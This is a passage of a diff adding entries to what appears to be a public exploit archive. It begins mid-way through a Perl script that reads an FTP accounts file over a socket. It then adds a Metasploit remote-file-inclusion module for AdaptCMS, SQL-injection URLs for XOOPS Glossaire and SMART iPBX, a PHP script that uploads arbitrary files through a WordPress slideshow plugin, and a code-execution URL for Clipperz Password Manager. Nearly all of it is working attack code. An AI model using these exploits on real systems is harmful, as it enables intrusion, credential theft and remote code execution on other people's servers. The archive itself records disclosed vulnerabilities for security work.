+$socket->send("type ftp_accounts.txt"); 
+
+while($socket->recv($inline, MAXBYTES)) { 
+	 if($inline =~ /admin/ig) { print $inline; exit;  }
+}
+
+sleep(1);
--- a/platforms/php/webapps/15237.rb
+++ b/platforms/php/webapps/15237.rb
@ -0,0 +1,83 @@
+##
+#      )   )            )                     (   (         (   (    (       )     ) 
+#  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
+#  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
+# ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
+#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
+#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
+# \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
+#  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
+#										.WEB.ID
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
+			'Description'    => %q{
+					This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
+
+			},
+			'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     => 				
+				[
+					[ 'CVE', '2010-2618' ],
+					[ 'BID', '41116' ],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+						},
+					'Space'       => 262144, # 256k
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Oct 12 2010',
+			'DefaultTarget' => 0))
+
+		register_options([
+			OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
+			], self.class)
+	end
+
+	def php_exploit
+
+		timeout = 0.01
+		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
+		print_status("Trying uri #{uri}")
+
+		response = send_request_raw( {
+				'global' => true,
+				'uri' => uri,
+			},timeout)
+
+		if response and response.code != 200
+			print_error("Server returned non-200 status code (#{response.code})")
+		end
+		
+		handler
+	end
+
+end
--- a/platforms/php/webapps/39188.txt
+++ b/platforms/php/webapps/39188.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67460/info
+
+Glossaire module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Glossaire 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] 
--- a/platforms/php/webapps/39189.txt
+++ b/platforms/php/webapps/39189.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67465/info
+
+SMART iPBX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1 
--- a/platforms/php/webapps/39190.php
+++ b/platforms/php/webapps/39190.php
@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/67469/info
+
+The cnhk-slideshow plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+<?php
+$uploadfile="file.php";
+$ch = curl_init("
+http://localhost/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('slideshow'=>"@$uploadfile"));
+curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+?>
--- a/platforms/php/webapps/39191.txt
+++ b/platforms/php/webapps/39191.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67498/info
+
+Clipperz Password Manager is prone to remote code-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the affected application. 
+
+http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die